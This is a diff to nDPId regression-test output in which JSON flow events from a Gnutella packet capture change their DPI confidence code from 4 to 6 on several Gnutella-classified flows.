00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287858,"flow_last_seen":287858,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":28681,"dst_port":4297,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3554,7 +3554,7 @@ 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287681,"flow_last_seen":287681,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":59978,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287525,"flow_last_seen":287525,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":28681,"dst_port":53195,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287525,"flow_last_seen":287525,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":28681,"dst_port":53195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":174303,"flow_last_seen":287509,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1210,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":174303,"flow_last_seen":287509,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1210,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287424,"flow_last_seen":287424,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":42925,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287424,"flow_last_seen":287424,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":42925,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287387,"flow_last_seen":287752,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":28681,"dst_port":8890,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3575,7 +3575,7 @@ 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287316,"flow_last_seen":287316,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":28681,"dst_port":8070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287442,"flow_last_seen":287442,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":28681,"dst_port":65274,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287442,"flow_last_seen":287442,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":28681,"dst_port":65274,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90005,"flow_last_seen":287678,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5605,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90005,"flow_last_seen":287678,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5605,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287498,"flow_last_seen":287719,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":28681,"dst_port":15068,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287498,"flow_last_seen":287719,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":28681,"dst_port":15068,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":251768,"flow_last_seen":287699,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":28681,"dst_port":28365,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3598,7 +3598,7 @@ 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287487,"flow_last_seen":287487,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":28681,"dst_port":49737,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287426,"flow_last_seen":287426,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":28681,"dst_port":20347,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287426,"flow_last_seen":287426,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":28681,"dst_port":20347,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":123912,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":123912,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287486,"flow_last_seen":287486,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":28681,"dst_port":57492,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287486,"flow_last_seen":287486,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":28681,"dst_port":57492,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287385,"flow_last_seen":287385,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"58.176.62.40","src_port":28681,"dst_port":52889,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3607,7 +3607,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287621,"flow_last_seen":287621,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.149","src_port":28681,"dst_port":54436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287977,"flow_last_seen":288382,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287977,"flow_last_seen":288382,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287857,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2839,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":95784,"flow_last_seen":287857,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2839,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287699,"flow_last_seen":287699,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.217.188.105","src_port":28681,"dst_port":62849,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287699,"flow_last_seen":287699,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.217.188.105","src_port":28681,"dst_port":62849,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287654,"flow_last_seen":287654,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.254.140.225","src_port":28681,"dst_port":63637,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3618,7 +3618,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287623,"flow_last_seen":287623,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":53454,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251764,"flow_last_seen":287316,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.165.153.100","src_port":28681,"dst_port":4509,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251764,"flow_last_seen":287316,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.165.153.100","src_port":28681,"dst_port":4509,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287483,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3990,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287483,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3990,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287314,"flow_last_seen":287314,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.94.85.113","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287314,"flow_last_seen":287314,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.94.85.113","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287523,"flow_last_seen":287523,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.139.21.182","src_port":28681,"dst_port":50110,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3669,7 +3669,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":287429,"flow_last_seen":287429,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":28681,"dst_port":4315,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":243616,"flow_last_seen":288106,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":28681,"dst_port":29545,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":243616,"flow_last_seen":288106,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":28681,"dst_port":29545,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
